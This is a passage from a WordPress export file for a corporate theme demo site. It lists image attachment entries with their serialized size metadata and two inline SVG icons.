		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:23:"2020/09/gallery-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"gallery-2-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"gallery-2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"gallery-2-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-2-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/how-to-write-a-successful-grant-application/gallery-3/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>440</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:23:"2020/09/gallery-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"gallery-3-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"gallery-3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"gallery-3-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-3-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>blog-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/blog-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/blog-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>448</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>447</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/blog-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/blog-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:20:"2020/09/blog-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:20:"blog-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"blog-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"blog-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"blog-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"blog-1-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/contacts/pheader-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>457</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-contacts.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:30:"2020/09/pheader-contacts.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:29:"pheader-contacts-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"pheader-contacts-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"pheader-contacts-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"pheader-contacts-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"pheader-contacts-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-contacts-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-contacts-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"pheader-contacts-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"pheader-contacts-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/contacts/image-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 10:51:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-contacts.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>465</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 10:51:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 10:51:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-contacts.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image-contacts.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:849;s:6:"height";i:878;s:4:"file";s:28:"2020/09/image-contacts.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:28:"image-contacts-1-290x300.png";s:5:"width";i:290;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"image-contacts-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:28:"image-contacts-1-768x794.png";s:5:"width";i:768;s:6:"height";i:794;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"image-contacts-1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"image-contacts-1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"image-contacts-1-849x600.png";s:5:"width";i:849;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-typo</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/typography/pheader-typo/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>473</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-typo]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-typo.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/09/pheader-typo.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-typo-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-typo-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-typo-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-typo-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-typo-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-typo-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-typo-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-typo-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-typo-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>down-arrow</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/typography/down-arrow/</link>
		<pubDate>Mon, 07 Sep 2020 08:24:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/down-arrow.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>480</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:24:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:24:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[down-arrow]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/down-arrow.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/down-arrow.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>add</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/typography/add/</link>
		<pubDate>Mon, 07 Sep 2020 08:50:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/add.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>481</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:50:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:50:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[add]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/add.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/add.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/pheader-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>489</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:30:"2020/09/pheader-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:29:"pheader-about-us-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"pheader-about-us-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"pheader-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"pheader-about-us-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"pheader-about-us-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"pheader-about-us-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"pheader-about-us-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/image1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:25:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>491</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:25:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:25:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg]]></wp:attachment_url>
